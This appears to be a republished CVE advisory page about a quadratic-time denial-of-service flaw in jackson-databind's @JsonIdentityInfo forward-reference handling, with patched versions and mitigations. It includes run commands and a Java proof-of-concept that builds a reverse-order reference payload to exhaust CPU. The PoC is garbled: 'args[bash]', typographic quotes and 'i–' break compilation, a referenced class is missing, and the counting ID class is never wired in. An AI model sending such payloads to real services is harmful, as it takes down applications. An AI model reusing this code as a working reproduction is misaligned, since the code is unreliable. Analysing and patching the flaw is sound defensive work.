jackson-databind, Quadratic Forward-Reference Completion, CVE-2026-91777 (High) -DC-Sep2026-2667

Listen to this Post

CVE-2026-91777 is a high-severity denial-of-service vulnerability in FasterXML jackson-databind. The flaw resides in the forward-reference completion logic used when deserializing JSON into collections or maps annotated with @JsonIdentityInfo. When an attacker submits a shallow JSON document that first declares N unresolved object-ID references and then resolves those same IDs in reverse order, the deserializer performs a linear scan of the pending-reference accumulator for every resolved ID. This results in approximately N (N + 1) / 2 identity comparisons, turning a linear-size input into quadratic CPU work. The affected code paths are CollectionDeserializer.CollectionReferringAccumulator.resolveForwardReference() and the equivalent implementation in MapDeserializer. The vulnerability was runtime-confirmed in jackson-databind 2.5.0, 2.22.1, and 3.2.1, with 2.5.0 identified as the conservative affected floor because a 2.4.0 control fails closed before successful reverse-order completion. The issue does not require deep nesting or syntactically unusual JSON. Exploitation requires an application that deserializes attacker-influenced JSON into an identity-enabled collection or map. The reported impact is limited to availability; there is no confidentiality, integrity, or code-execution impact. The fix replaces the repeated linear lookup with a keyed pending-reference structure. Patched versions are 2.18.11, 2.21.7, 2.22.3, 3.1.7, and 3.2.3. The vulnerability was reported by Daniel Birtwhistle.

DailyCVE Form:

Platform: jackson-databind
Version: 2.5.0–3.2.2
Vulnerability: Quadratic Forward-Reference
Severity: High
date: 2026-09-23

Prediction: 2026-10-15

What Undercode Say: Analytics

Bash commands:

java -Xmx512M -cp target/classes:target/test-classes com.example.PoC –size 2000

javac -d target/classes src/main/java/com/example/PoC.java

mvn clean test -Dtest=QuadraticForwardReferenceTest

Code:

// ID class that counts equals() calls

public class CountingId {

private final int value;

private static long equalsCalls = 0;

public CountingId(int value) { this.value = value; }

@Override

public boolean equals(Object o) {

equalsCalls++;

if (this == o) return true;

if (!(o instanceof CountingId)) return false;

return value == ((CountingId) o).value;

}

@Override

public int hashCode() { return value; }

public static long getEqualsCalls() { return equalsCalls; }

public static void reset() { equalsCalls = 0; }
}

// PoC main

public class PoC {

public static void main(String[] args) {

int n = Integer.parseInt(args[bash]);

CountingId.reset();

// Build JSON: N references then reverse-order definitions

StringBuilder json = new StringBuilder(“{\”items\”:[“);

for (int i = 0; i < n; i++) {

if (i > 0) json.append(“,”);

json.append(“{\”id\”:” + i + “,\”ref\”:true}”);

}
for (int i = n – 1; i >= 0; i–) {

json.append(“,{\”id\”:” + i + “,\”ref\”:false}”);

}

json.append(“]}”);

ObjectMapper mapper = new ObjectMapper();

mapper.readValue(json.toString(), CollectionWrapper.class);

System.out.println(“Equals calls: ” + CountingId.getEqualsCalls());

}
}

How Exploit: (Educational Purposes!)

The exploit constructs a JSON payload with a shallow collection containing N unresolved @JsonIdentityInfo references followed by definitions of the same IDs in reverse order. With N=2,000, affected versions perform exactly 2,003,000 ID comparisons, while a control with all references already resolved performs zero comparisons in the pending-reference lookup path. The run is bounded to a 512 MiB JVM. The result demonstrates quadratic growth: approximately N (N + 1) / 2 comparisons, plus fixed setup comparisons. An unauthenticated source that can submit JSON to an application using the affected identity-enabled collection or map shape can consume quadratic CPU and exhaust a request-time or worker-capacity budget, causing denial of service.

Protection: from this CVE

Upgrade to com.fasterxml.jackson.core:jackson-databind 2.18.11, 2.21.7, or 2.22.3, or to tools.jackson.core:jackson-databind 3.1.7 or 3.2.3. Bound the size of JSON documents deserialized into @JsonIdentityInfo-enabled collections and maps, and cap the number of elements accepted for such types. Remove @JsonIdentityInfo from types reachable from attacker-influenced input. Apply wall-clock timeouts on deserialization to limit the impact of a single request.

Impact:

An unauthenticated source that can submit JSON to an application using the affected identity-enabled collection or map shape can consume quadratic CPU and exhaust a request-time or worker-capacity budget, causing denial of service. The application model/configuration prerequisite is material. No confidentiality, integrity, code-execution, or parser-depth impact is claimed. Requested credit: Daniel Birtwhistle.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top